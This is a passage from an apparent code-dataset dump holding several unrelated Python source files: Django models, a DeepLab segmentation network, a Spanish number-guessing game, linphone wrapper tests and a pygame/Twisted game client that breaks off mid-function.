on_delete=models.CASCADE,\n related_name='members',\n )\n member = models.ForeignKey(\n 'event.EventTeamMember',\n on_delete=models.CASCADE,\n related_name='event_security_layers',\n )\n\n def previous_security_layer_level(self):\n from event.services import previous_event_security_layer\n return previous_event_security_layer(self.event_security_layer)\n\nclass SecurityLayer(BaseModel):\n # id = models.UUIDField(\n # default=uuid.uuid4, \n # primary_key=True, \n # editable=False,\n # unique=True,\n # verbose_name=\"Id\"\n # )\n name = models.CharField(\n max_length=100,\n verbose_name=_('Name'),\n )\n organizer = models.ForeignKey(\n 'event.Organizer',\n on_delete=models.CASCADE\n )\n\nclass SecurityLayerMember(BaseModel):\n security_layer = models.ForeignKey(\n SecurityLayer,\n on_delete=models.CASCADE,\n related_name='security_layer_members'\n )\n member = models.ForeignKey(\n 'event.TeamMember',\n on_delete=models.CASCADE,\n related_name='security_layers' \n )","repo_name":"5no0p/scan-worker","sub_path":"event/models/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40731572439","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\nfrom modeling.maspp import build_maspp\nfrom modeling.decoder_maspp import build_decoder\nfrom modeling.backbone import build_backbone\n\nclass DeepLab(nn.Module):\n # def __init__(self, backbone='resnet', output_stride=16, num_classes=21,\n # sync_bn=True, freeze_bn=False):\n def __init__(self, backbone='resnet', output_stride=16, num_classes=8,\n sync_bn=True, freeze_bn=False):\n super(DeepLab, self).__init__() # 自己搭建的网络Deeplab会继承nn.Module:\n if backbone == 'drn': # 深度残差网络\n output_stride = 8 # 卷积输出时缩小的倍数 224/7=32\n\n if sync_bn == True:\n BatchNorm = SynchronizedBatchNorm2d # 每层进行归一化处理\n else:\n BatchNorm = nn.BatchNorm2d # 数据的归一化处理 y = \\frac{x - \\mathrm{E}[x]}{ \\sqrt{\\mathrm{Var}[x] + \\epsilon}} * \\gamma + \\beta\n\n self.backbone = build_backbone(backbone, output_stride, BatchNorm) # 'resnet' 16 BatchNorm2d\n self.maspp = build_maspp(backbone, output_stride, BatchNorm)\n self.decoder = build_decoder(num_classes, backbone, BatchNorm)\n\n self.freeze_bn = freeze_bn\n\n # MASPP+注意力模块\n def forward(self, input): # aspp->maspp\n [x1, x2, x3, x4] = self.backbone(input) # resnet:x4:[4,2048,32,32] x3:[4,1024,32,32] x2:[4,512,64,64] x1:[4,256,128,128]\n maspp = self.maspp(x4) # [4,256,32,32]\n\n x = self.decoder(maspp, x4, x3, x2, x1) # [4,8,128,128]\n # 最后进行4倍上采样\n x = F.interpolate(x, size=input.size()[2:], mode='bilinear', align_corners=True) # 4倍上采样 ->[4,8,512,512]\n\n return x\n\n def freeze_bn(self):\n for m in self.modules():\n if isinstance(m, SynchronizedBatchNorm2d):\n m.eval()\n elif isinstance(m, nn.BatchNorm2d):\n m.eval()\n\n def get_1x_lr_params(self):\n modules = [self.backbone]\n for i in range(len(modules)):\n for m in modules[i].named_modules():\n if self.freeze_bn: # freeze_bn=false\n if isinstance(m[1], nn.Conv2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n else:\n if isinstance(m[1], nn.Conv2d) or isinstance(m[1], SynchronizedBatchNorm2d) \\\n or isinstance(m[1], nn.BatchNorm2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n\n def get_10x_lr_params(self):\n modules = [self.maspp, self.decoder]\n for i in range(len(modules)):\n for m in modules[i].named_modules():\n if self.freeze_bn:\n if isinstance(m[1], nn.Conv2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n else:\n if isinstance(m[1], nn.Conv2d) or isinstance(m[1], SynchronizedBatchNorm2d) \\\n or isinstance(m[1], nn.BatchNorm2d):\n for p in m[1].parameters():\n if p.requires_grad:\n yield p\n\nif __name__ == \"__main__\":\n # model = DeepLab(backbone='mobilenet', output_stride=16)\n model = DeepLab(backbone='resnet', output_stride=16)\n model.eval() # 不启用 BatchNormalization 和 Dropout,保证BN和dropout不发生变化\n input = torch.rand(1, 3, 512, 512)\n output = model(input)\n print(output.size())\n","repo_name":"LHY-huiyin/Semantic-Segmentation","sub_path":"newmodeling/structure/deeplab_maspp.py","file_name":"deeplab_maspp.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31261284868","text":"from random import randint\r\nfrom time import sleep\r\nimport os\r\n\r\n# Evitar el cartel de bienvenida de la librería pygame\r\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\r\nfrom pygame import mixer\r\nmixer.init()\r\nSILVATO = mixer.Sound(\"sonidos/start.ogg\")\r\nWINNER = mixer.Sound(\"sonidos/winner.ogg\")\r\nLOOSER = mixer.Sound(\"sonidos/looser.ogg\")\r\nNEXT = mixer.Sound(\"sonidos/next.ogg\")\r\n\r\nclass Configuraciones():\r\n\tdef __init__(self):\r\n\t\tself.colores = [\"negro\", \"azul\", \"verde\", \"agua\", \"rojo\", \"morado\", \"amarillo\", \"blanco\", \"gris\"]\r\n\t\tself.num_max = None\r\n\t\tself.rondas = None\r\n\t\tself.ronda = 1\r\n\t\tself.fondo = None\r\n\t\tself.letras = None\r\n\t\tself.jugador = None\r\n\t\tself.dificultad = None\r\n\t\tself.init()\r\n\r\n\tdef init(self):\r\n\t\tself.jugador = input(\"Hola. Por favor escribe tu nombre y pulsa intro\")\r\n\t\twhile True:\r\n\t\t\tprint(f\"Bienvenido {self.jugador}!\\nEs momento de personalizar un poco el aspecto de el fondo y las letras. Comencemos por el fondo, y luego las letras.\\nEscribe el color que quieras y al finalizar pulsa intro. Los colores disponibles son:\")\r\n\t\t\tfor color in self.colores:\r\n\t\t\t\tprint(color)\r\n\t\t\tfondo = input(\"ingresa el color de fondo\")\r\n\t\t\tif fondo in self.colores:\r\n\t\t\t\tcaracteres = input(\"Ahora ingresa el color de los caracteres\")\r\n\t\t\t\tif caracteres in self.colores:\r\n\t\t\t\t\tos.system(f\"color {self.colores.index(fondo)}{self.colores.index(caracteres)}\")\r\n\t\t\t\t\tprint(f\"perfecto. Has seleccionado el fondo {fondo}, y el color {caracteres} para los caracteres\")\r\n\t\t\t\t\tbreak\r\n\t\tself.seleccionar_dificultad()\r\n\r\n\tdef seleccionar_dificultad(self):\r\n\t\twhile True:\r\n\t\t\tself.dificultad = input(\"Ahora es el turno de la dificultad. Ingresa el número de opción y pulsa intro:\\n1 Facilona\\n2 Solo para valientes\\n3 ¡imposible!\")\r\n\t\t\tif self.dificultad == \"1\":\r\n\t\t\t\tself.num_max = 20\r\n\t\t\t\tself.rondas = 6\r\n\t\t\t\tprint(\"Has seleccionado la opción 1. A ver como te va con la facilona...\")\r\n\t\t\t\tbreak\r\n\t\t\telif self.dificultad == \"2\":\r\n\t\t\t\tself.num_max = 50\r\n\t\t\t\tself.rondas = 7\r\n\t\t\t\tprint(\"¡Apa! Aquí tenemos a alguien valiente. Mucha suerte...\")\r\n\t\t\t\tbreak\r\n\t\t\telif self.dificultad == \"3\":\r\n\t\t\t\tself.num_max = 100\r\n\t\t\t\tself.rondas = 8\r\n\t\t\t\tprint(\"!Atención! Una personita intrépida que se le anima al imposible. A cruzar los dedos...\")\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Has ingresado un valor incorrecto. Vuelve a intentarlo\")\r\n\t\tself.rand = randint(1, self.num_max)\r\n\t\tsleep(1.8)\r\n\t\tmixer.music.stop()\r\n\t\tSILVATO.play()\r\n\t\tsleep(1)\r\n\r\nclass Juego():\r\n\r\n\tdef __init__(self):\r\n\t\tmixer.music.load(\"sonidos/init.ogg\")\r\n\t\tmixer.music.play(-1)\r\n\t\tprint(\"¡Adivinador!\")\r\n\t\tsleep(2)\r\n\t\tself.configuraciones = Configuraciones()\r\n\t\tself.start()\r\n\r\n\tdef start(self):\r\n\t\tmixer.music.load(\"sonidos/background.ogg\")\r\n\t\tmixer.music.play(-1)\r\n\t\tmixer.music.set_volume(0.2)\r\n\t\twhile self.configuraciones.ronda <= self.configuraciones.rondas:\r\n\t\t\tself.rondas()\r\n\t\t\ttry:\r\n\t\t\t\tusuario = int(input())\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Valor incorrecto\")\r\n\t\t\t\tcontinue\r\n\t\t\tif usuario < 1 or usuario > self.configuraciones.num_max:\r\n\t\t\t\tprint(\"Fuera de rango\")\r\n\t\t\t\tcontinue\r\n\t\t\tif usuario == self.configuraciones.rand:\r\n\t\t\t\tself.winner()\r\n\t\t\t\tbreak\r\n\t\t\telif usuario > self.configuraciones.rand:\r\n\t\t\t\tif self.configuraciones.ronda < self.configuraciones.rondas:\r\n\t\t\t\t\tprint(\"nops..d. 😳. Es un número menor\")\r\n\t\t\telif usuario < self.configuraciones.rand:\r\n\t\t\t\tif self.configuraciones.ronda < self.configuraciones.rondas:\r\n\t\t\t\t\tprint(\"nops... 😳. Es un número mayor...\")\r\n\t\t\tself.configuraciones.ronda+=1\r\n\t\t\tNEXT.play()\r\n\t\tself.looser()\r\n\r\n\tdef winner(self):\r\n\t\tprint(\"¡Cooooorrecto! 🫂 🥳\")\r\n\t\tmixer.music.stop()\r\n\t\tWINNER.play()\r\n\t\tsleep(6)\r\n\t\tprint(f\"Felicitaciones {self.configuraciones.jugador}. Has ganado en la ronda {self.configuraciones.ronda}\")\r\n\t\tsleep(2)\r\n\t\tself.finish(\"Victoria\")\r\n\r\n\tdef looser(self):\r\n\t\tmixer.music.stop()\r\n\t\tLOOSER.play()\r\n\t\tsleep(2.5)\r\n\t\tprint(f\"😥. El número secreto era el {self.configuraciones.rand}. Has perdido el juego {self.configuraciones.jugador}. Otra vez será!\")\r\n\t\tsleep(3)\r\n\t\tself.finish(\"Derrota\")\r\n\r\n\tdef finish(self, estado):\r\n\t\twith open(\"historial.txt\", \"a\") as file:\r\n\t\t\tfile.write(f\"jugador: {self.configuraciones.jugador}- Resultado: {estado}- dificultad: {self.configuraciones.dificultad}- rondas: {self.configuraciones.ronda}\\n\")\r\n\t\tprint(\"Gracias por jugar\")\r\n\t\tsleep(1.5)\r\n\t\texit()\r\n\r\n\tdef rondas(self):\r\n\t\tif self.configuraciones.ronda == 1:\r\n\t\t\tprint(f\"¡Que comience el juego!. El número que debes adivinar está entre 1 y {self.configuraciones.num_max}. Cuál es tu apuesta? Tienes {self.configuraciones.rondas} oportunidades\")\r\n\t\telif self.configuraciones.ronda == self.configuraciones.rondas:\r\n\t\t\tprint(\"¡última oportunidad! 😨\")\r\n\t\telse:\r\n\t\t\tprint(f\"ronda {self.configuraciones.ronda}\")\r\n\r\nJuego()","repo_name":"GerardKessler/adivinador","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3300596350","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\n__author__ = \"Julien Barreau\"\n__copyright__ = \"(C) 2014 by MHComm. All rights reserved\"\n__email__ = \"info@mhcomm.fr\"\n\n# -----------------------------------------------------------------------------\n# Imports\n# -----------------------------------------------------------------------------\nimport logging\nimport os\nimport time\n\nif True:\n from unittest import TestCase\nelse:\n class TestCase(object):\n pass\n\nimport unittest\nfrom nose.plugins.attrib import attr\nimport xmlrpclib\n\nfrom wrappers.bd_linphone_wrapper import MHLinphoneWrapper\nfrom wrappers.common import ControlMessage\nfrom lp_config import LPConfig\n# -----------------------------------------------------------------------------\n# Globals\n# -----------------------------------------------------------------------------\nlogger = logging.getLogger(__name__)\n\ndef isnotdev():\n return os.environ.get('DEV') != 'JULIEN'\n\n# def skipifnotdev(*args, **kwargs):\n# return unittest.skipIf(os.environ.get('DEV') != 'JULIEN', *args, **kwargs)\n\nclass LPBaseTest(TestCase):\n \"\"\"\n Base class for tests mhlinphone_wrapper\n \"\"\"\n wrapper = None\n ref_count = 0\n @classmethod\n def setUpClass(cls):\n \"\"\" setUp method for tests in this class \"\"\"\n logger.debug(\"----*---- setupclass %r\", cls)\n TestCase.setUpClass()\n\n logger.debug('in SetUpClass, refcnt : %d', LPBaseTest.ref_count)\n if not LPBaseTest.wrapper:\n LPBaseTest.wrapper = MHLinphoneWrapper(\n rc_config_file=os.path.join(LPConfig.get_default_lp_data_dir(),\n \"unit_test.linphonerc\")\n )\n\n LPBaseTest.wrapper.init()\n if LPBaseTest.wrapper.proxy_enable:\n if not LPBaseTest.wrapper.is_ready_to_call():\n server = LPBaseTest.wrapper.wait_for_registered(20)\n assert server is not None\n LPBaseTest.ref_count += 1\n\n @classmethod\n def tearDownClass(cls):\n \"\"\" tearDown method for tests in this class \"\"\"\n logger.debug('in tearDownClass, refcnt : %d', LPBaseTest.ref_count)\n LPBaseTest.ref_count -= 1\n logger.debug(\"----*---- tearDown class %r\", cls)\n if LPBaseTest.ref_count == 0:\n TestCase.tearDownClass()\n logger.info(\"killing linphone\")\n LPBaseTest.wrapper.exit()\n LPBaseTest.wrapper = None\n\n@attr(needs_nothing=True)\nclass LPSimpleTest(LPBaseTest):\n \"\"\"\n Simple tests class for mhlinphone_wrapper\n \"\"\"\n\n def test_01_launch(self):\n \"\"\" if linphone is ready \"\"\"\n LPBaseTest.wrapper.is_running()\n\n self.assertTrue(LPBaseTest.wrapper.is_running(),\n msg=\"linphone core not running\")\n\n def test_02_camera_exists(self):\n \"\"\" if linphone have connected camera \"\"\"\n LPBaseTest.wrapper.get_status()\n cams = LPBaseTest.wrapper.webcam()\n\n self.assertTrue(len(cams) >= 1, \"system doesn't have webcam\")\n\n def test_03_use_camera(self):\n \"\"\" if linphone can use a camera \"\"\"\n cams = LPBaseTest.wrapper.webcam()\n prefered = None\n all_cams = []\n for cam in cams:\n all_cams.append(cam)\n if \"Logitech HD Pro Webcam C920\" in cam:\n prefered = cams.index(cam)\n\n if prefered:\n cam = prefered\n else:\n cam = 0\n\n LPBaseTest.wrapper.webcam(cam)\n\n used_webcam = LPBaseTest.wrapper.get_used_webcam()\n logger.debug(\"cam : %r, used cam : %r\", cams[cam], used_webcam)\n\n self.assertTrue(cams[cam] in used_webcam)\n\n\nclass ComLPTest(object):\n# class ComLPTest(LPBaseTest):\n \"\"\"\n Test class for on communication mhlinphone_wrapper\n without call tests\n \"\"\"\n# config = None\n# remote_sip_addr = None\n# local_sip_addr = None\n# remote_linphone = None\n#\n# @classmethod\n# def setUpClass(cls):\n# \"\"\" setUp method for tests in this class \"\"\"\n# LPBaseTest.setUpClass()\n# logger.debug(\"----*---- setupclass %r\", cls)\n# cls.config = LPConfig(LPConfig.get_default_lp_config())\n#\n# rpc_addr = cls.config.get(\"test.address\")\n# rpc_port = cls.config.get(\"test.port\")\n#\n# cls.remote_sip_addr = cls.config.get(\"test.remote_sip_addr\")\n# logger.debug('-|-|-| remote_sip_addr : %r', cls.remote_sip_addr)\n# cls.local_sip_addr = cls.config.get(\"local_sip_addr\")\n# logger.debug('-|-|-| local_sip_addr : %r', cls.local_sip_addr)\n#\n# cls.remote_linphone = xmlrpclib.ServerProxy('http://%s:%s/MH_LP' %\n# (rpc_addr, str(rpc_port)),\n# allow_none=True,\n# )\n#\n# logger.debug('--- remote: '+str(cls.remote_linphone.is_running())+\n# ' --- local: '+str(LPBaseTest.wrapper.is_running())+ ' --- '+\n# str(cls.__class__))\n#\n# if not cls.remote_linphone.is_running():\n# cls.remote_linphone.init()\n# cls.remote_linphone.wait_for_registered()\n#\n#\n# @attr(needs_rmt_lp=True, needs_net=True)\nclass ChatTest(object):\n pass\n# class ChatTest(ComLPTest):\n#\n# def test_01_com(self):\n# \"\"\" remote linphone is running \"\"\"\n# self.assertTrue(self.remote_linphone.is_running())\n# self.assertTrue(LPBaseTest.wrapper.is_running())\n#\n# def test_02_chat(self):\n# \"\"\" sip message \"\"\"\n# # time.sleep(3)\n# LPBaseTest.wrapper.send_message(\"msg1\", self.remote_sip_addr)\n#\n# ret = self.remote_linphone.wait_for_message(15)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n# sender, msg = ret\n# logger.debug(\"sender : %r, msg : %r, local addr : %r\",\n# sender, msg, LPBaseTest.wrapper.identity)\n#\n# self.assertEqual(sender, LPBaseTest.wrapper.identity,\n# \"not same sender\")\n# self.assertEqual(msg, \"msg1\", \"not same message\")\n#\n#\n# @attr(needs_rmt_lp=True)\n# @attr(needs_cam=True, needs_net=True)\nclass OnCallLPTest(object):\n# class OnCallLPTest(ComLPTest):\n \"\"\" Test class for on call mhlinphone_wrapper \"\"\"\n# def setUp(self):\n# \"\"\" setup method for call tests \"\"\"\n# logger.debug(\"----*---- setup %r\", self)\n# ComLPTest.setUp(self)\n#\n# logger.info(\"calling %r\", self.remote_sip_addr)\n# LPBaseTest.wrapper.call(self.remote_sip_addr)\n#\n# logger.debug(\"waiting for remote incoming\")\n# ret = self.remote_linphone.wait_for_incoming(15)\n# self.assertIsNotNone(ret, \"rpc wait for incoming call fail\")\n#\n# logger.debug(\"remote incoming call wait\")\n# self.remote_linphone.answer()\n#\n# ret = self.remote_linphone.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"rpc wait for answered call fail\")\n#\n# ret = LPBaseTest.wrapper.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"wait for answered call fail\")\n#\n# LPBaseTest.wrapper.get_status()\n#\n# def tearDown(self):\n# \"\"\" tearDown method for call tests \"\"\"\n# logger.debug(\"----*---- tearDown %r\", self)\n# ComLPTest.tearDown(self)\n#\n# if LPBaseTest.wrapper.is_in_call():\n# LPBaseTest.wrapper.terminate_call()\n#\n# ret = LPBaseTest.wrapper.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n# ret = self.remote_linphone.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n# else:\n# logger.warning(\"linphone should be on call, it isn't\")\n# LPBaseTest.wrapper.terminate_call()\n#\n#\n# def test_01_call(self):\n# \"\"\" if linphone is on call \"\"\"\n# time.sleep(3) # 5seconds call\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# def test_02_snapshot(self):\n# \"\"\" if linphone can take snapshot \"\"\"\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# tmp_dir = os.path.join(self.config.get_default_lp_data_dir(),\n# self.config.get('mh_lp.tmp_dir'))\n#\n# snapshot_path = os.path.join(tmp_dir, \"snapshot.jpg\")\n#\n# if not os.path.isdir(tmp_dir):\n# os.mkdir(tmp_dir)\n#\n# snapshot_path, ret = LPBaseTest.wrapper.snapshot(snapshot_path)\n# logger.debug(\"return of snapshot : %r\", str(ret))\n#\n# time.sleep(1)\n#\n# path_exist = os.path.exists(snapshot_path)\n#\n# self.assertTrue(path_exist, \"snapshot file %r doesn't exists\"\n# % snapshot_path)\n#\n# if path_exist:\n# os.unlink(snapshot_path)\n# else:\n# logger.error(\"cannot create snapshot\")\n# logger.error(\"command result: %r\", str(ret))\n#\n# #TODO: assert jpeg readable\n# #TODO: assert img resolution\n#\n# def test_03_preview_snapshot(self):\n# \"\"\" tests : if linphone can take preview-snapshot \"\"\"\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# tmp_dir = os.path.join(self.config.get_default_lp_data_dir(),\n# self.config.get('mh_lp.tmp_dir'))\n#\n# snapshot_path = os.path.join(tmp_dir, \"preview-snapshot.jpg\")\n#\n# if not os.path.isdir(tmp_dir):\n# os.mkdir(tmp_dir)\n#\n# snapshot_path, ret = LPBaseTest.wrapper.preview_snapshot(snapshot_path)\n# logger.debug(\"return of preview snapshot : %r\", str(ret))\n# time.sleep(1)\n#\n# path_exist = os.path.exists(snapshot_path)\n#\n# self.assertTrue(path_exist, \"preview snapshot file %r doesn't exists\"\n# % snapshot_path)\n#\n# if path_exist:\n# os.unlink(snapshot_path)\n# else:\n# logger.error(\"cannot create preview snapshot\")\n# logger.error(\"command result: %r\", str(ret))\n#\n# #TODO: assert jpeg readable\n# #TODO: assert img resolution\n#\n# def test_04_msg_on_call(self):\n# \"\"\" if linphone can send message on call \"\"\"\n# msg = \"one verry verry long message\"\n# LPBaseTest.wrapper.send_message(msg, self.remote_sip_addr)\n#\n# ret = self.remote_linphone.wait_for_message(15)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n#\n# (sender, rec_msg) = ret\n#\n# logger.debug(\"sender : %r;local addr : %r\", sender,\n# LPBaseTest.wrapper.identity)\n# self.assertEqual(sender, LPBaseTest.wrapper.identity,\n# \"remote sender and local addr must be the same\")\n# self.assertEqual(rec_msg, msg,\n# \"messages must be the same\")\n#\n# @attr(in_dev=True)\n# @attr(needs_mh_si_srv=True)\n# def test_05_preview_snapshot_command(self):\n# \"\"\" --- preview snapshot command \"\"\"\n# ctrl_msg = ControlMessage('rmt_preview_snapshot')\n# self.remote_linphone.send_control_message(LPBaseTest.wrapper.identity,\n# ctrl_msg.to_string())\n#\n# # time.sleep(2)\n#\n# logger.info('waiting for message')\n# ret = self.remote_linphone.wait_for_message(35)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n# if ret:\n# sender, rec_msg = ret\n# logger.debug(\"receive message from %r : %r\", sender, rec_msg)\n# else:\n# logger.error(\"error waiting message\")\n#\n# @attr(nightly=True)\n# def test_06_stress(self):\n# \"\"\" tests : if linphone can do a lot of call, without bug \"\"\"\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# start = time.time()\n#\n# # CALL_TIME = 20*60 # seconds\n# # TOTAL_TIME = 8*60*60 # seconds\n# CALL_TIME = 10 # seconds\n# TOTAL_TIME = 2*60 # seconds\n#\n# while (time.time() - start) < TOTAL_TIME:\n# # assert\n# self.assertTrue(LPBaseTest.wrapper.is_in_call() and\n# self.remote_linphone.is_in_call(),\n# \"both linphone must be on call\")\n#\n# # wait call_time\n# time.sleep(CALL_TIME)\n#\n# # terminate\n# LPBaseTest.wrapper.terminate_call()\n# logger.info('call terminated')\n#\n# ret = self.remote_linphone.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n#\n# # assert\n# self.assertFalse(LPBaseTest.wrapper.is_in_call() or\n# self.remote_linphone.is_in_call(),\n# \"both linphone mustn't be on call\")\n#\n# # call\n# LPBaseTest.wrapper.call(self.remote_sip_addr)\n# logger.debug('call launch')\n#\n# # answer\n# ret = self.remote_linphone.wait_for_incoming(15)\n# self.assertIsNotNone(ret, \"rpc wait incoming call fail\")\n#\n# self.remote_linphone.answer()\n# ret = self.remote_linphone.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"rpc wait answered call fail\")\n# logger.debug('call answered')\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n# -----------------------------------------------------------------------------\n# End of file\n# -----------------------------------------------------------------------------\n","repo_name":"mhcomm/mh_linphone","sub_path":"pylib/lp_tests/mhlinphone_wrapper.py","file_name":"mhlinphone_wrapper.py","file_ext":"py","file_size_in_byte":13494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22084166955","text":"import pygame\nimport math\nfrom .game import game, images\nfrom .blocks import (\n GRASS,\n STONE,\n BEDROCK\n)\nfrom .constants import (\n CHUNK_SIZE,\n DESIRED_FPS,\n MAX_SPEED,\n MAX_SPRINT\n)\nfrom twisted.internet.protocol import DatagramProtocol\nfrom twisted.internet import reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol\nfrom twisted.protocols import amp\nfrom twisted.internet.task import LoopingCall\nfrom .commands import (\n GetChunk,\n UpdateMaterial,\n UpdateUserPosition\n)\nimport jsonpickle\nbg_images = images.bg_images\nbutton_images = images.button_images\n\nclass MulticastPingClient(DatagramProtocol):\n\n def startProtocol(self):\n # Join the multicast address, so we can receive replies:\n self.transport.joinGroup(\"228.0.0.5\")\n # Send to 228.0.0.5:8005 - all listeners on the multicast address\n # (including us) will receive this message.\n self.transport.write(b'Client: Ping', (\"228.0.0.5\", 8005))\n\n def datagramReceived(self, datagram, address):\n print(\"Datagram %s received from %s\" % (repr(datagram), repr(address)))\n\n\nclass GameClient(amp.AMP):\n def updateMaterial(self, x, y, material):\n game.world.setMaterial(x, y, material)\n return {'result': True}\n UpdateMaterial.responder(updateMaterial)\n\n def updateUserPosition(self, user, x, y):\n game.playerPositions[user] = (x, y)\n return {'result': True}\n UpdateUserPosition.responder(updateUserPosition)\n\n\nclass WorldCache:\n def __init__(self):\n self.chunks = {}\n\n def chunk(self, x, y):\n cx = math.floor(x / CHUNK_SIZE)\n cy = math.floor(y / CHUNK_SIZE)\n if not self.chunks.get(cx):\n self.chunks[cx] = {}\n if not self.chunks[cx].get(cy) or self.chunks[cx][cy] == 'pending':\n if not self.chunks[cx].get(cy):\n\n def receivedChunk(result):\n self.chunks[cx][cy] = jsonpickle.decode(result['chunk'])\n d = game.protocol.callRemote(GetChunk, x=x, y=y)\n d.addCallback(receivedChunk)\n self.chunks[cx][cy] = 'pending'\n\n return None\n return self.chunks[cx][cy]\n\n def cell(self, x, y):\n c = self.chunk(x, y)\n if c:\n return c.cell(x, y)\n return (1, 0)\n\n def updateMaterial(self, x, y, m):\n if self.cell(x, y)[0] == m:\n return\n self.setMaterial(x, y, m)\n\n def updatedMaterial(result):\n pass\n d = game.protocol.callRemote(\n UpdateMaterial, x=x, y=y, material=m)\n d.addCallback(updatedMaterial)\n\n def setMaterial(self, x, y, m):\n c = self.chunk(x, y)\n if c:\n c.setMaterial(x, y, m)\n\n\ndef createScreen(x, y):\n return pygame.display.set_mode((x, y), pygame.RESIZABLE)\n\n\ndef pixelToGame(pt):\n x = (pt[0] - game.sizex / 2.0) / game.tileSize + game.mx\n y = (pt[1] - game.sizey / 2.0) / game.tileSize + game.my\n return (x, y)\n\n\ndef gameToPixel(pt):\n x = (pt[0] - game.mx) * game.tileSize + game.sizex / 2.0\n y = (pt[1] - game.my) * game.tileSize + game.sizey / 2.0\n return (x, y)\n\n\ndef play():\n game.startScreenLoop.stop()\n if game.host == '__builtin__':\n # Start a server as a subprocess\n import subprocess\n import time\n import sys\n import os\n command = os.path.join(os.path.dirname(sys.executable), 'make-a-game-server')\n args = [\n command,\n '--world', game.worldName,\n '--seed', str(game.seed),\n '--port', str(game.port)\n ]\n serverProc = subprocess.Popen(args, stdout=sys.stdout, stderr=sys.stderr)\n time.sleep(1)\n\n import atexit\n def doExit():\n print('Stopping server...')\n serverProc.terminate()\n atexit.register(doExit)\n\n #pygame.event.set_grab(True)\n #pygame.mouse.set_visible(False)\n game.font = pygame.font.SysFont('Comic Sans MS', 30)\n game.screen = createScreen(game.sizex, game.sizey)\n game.world = WorldCache()\n if game.host == '__builtin__':\n connectionHost = 'localhost'\n else:\n connectionHost = game.host\n game.server = TCP4ClientEndpoint(reactor, connectionHost, game.port)\n\n def connected(ampProto):\n game.protocol = ampProto\n # Set up a looping call every 1/30th of a second to run your game tick\n tick = LoopingCall(gameTick)\n tick.start(1.0 / DESIRED_FPS)\n connectProtocol(game.server, GameClient()).addCallback(connected)\n\n\ndef gamestart():\n import sys\n import os\n game.screen = createScreen(game.sizex, game.sizey)\n mouse = pygame.mouse.get_pos()\n clicked = False\n #grab = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n reactor.stop()\n if event.type == pygame.VIDEORESIZE:\n game.sizex = event.w\n game.sizey = event.h\n game.screen = createScreen(game.sizex, game.sizey)\n if event.type == pygame.MOUSEBUTTONDOWN:\n clicked = True\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'imgs')\n if game.screen_number == 0:\n game.screen.blit(pygame.transform.scale(bg_images[\"start_bg\"], (game.sizex, game.sizey)), (0, 0))\n button1Rect = pygame.Rect((0, 0), button_images[\"play_button\"].get_size())\n button2Rect = pygame.Rect((0, 0), button_images[\"multiplayer_button\"].get_size())\n button1Rect.center = (game.sizex/2, game.sizey/2)\n button2Rect.center = (game.sizex/2, game.sizey/2+70)\n if button1Rect.collidepoint(mouse):\n game.screen.blit(button_images[\"play_button_pressed\"], button1Rect.topleft)\n if clicked:\n game.screen_number = \"singleplayer\"\n play()\n else:\n game.screen.blit(button_images[\"play_button\"], button1Rect.topleft)\n if button2Rect.collidepoint(mouse):\n game.screen.blit(button_images[\"multiplayer_button_pressed\"], button2Rect.topleft)\n if clicked:\n game.screen_number = \"multiplayer\"\n else:\n game.screen.blit(button_images[\"multiplayer_button\"], button2Rect.topleft)\n elif game.screen_number == \"multiplayer\":\n game.screen.blit(pygame.transform.scale(bg_images[\"lan_bg\"], (game.sizex, game.sizey)), (0, 0))\n\n # for name in lan_games:\n # pass\n\n\n elif game.screen_number == \"singlplayer\":\n pass\n pygame.display.flip()\n\ndef gameTick():\n #grab = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n reactor.stop()\n if event.type == pygame.VIDEORESIZE:\n game.sizex = event.w\n game.sizey = event.h\n game.screen = createScreen(game.sizex, game.sizey)\n # if event.type == pygame.MOUSEBUTTONDOWN:\n # pygame.event.set_grab(True)\n # pygame.mouse.set_visible(False)\n # grab = True\n pressed = pygame.key.get_pressed()\n speedlimit = MAX_SPEED\n if pressed[pygame.K_LSHIFT]:\n speedlimit = MAX_SPRINT\n if pressed[pygame.K_UP]:\n game.fly = True\n if pressed[pygame.K_LEFT]:\n game.tileSize *= 1.1\n game.tileSize = round(game.tileSize)\n if 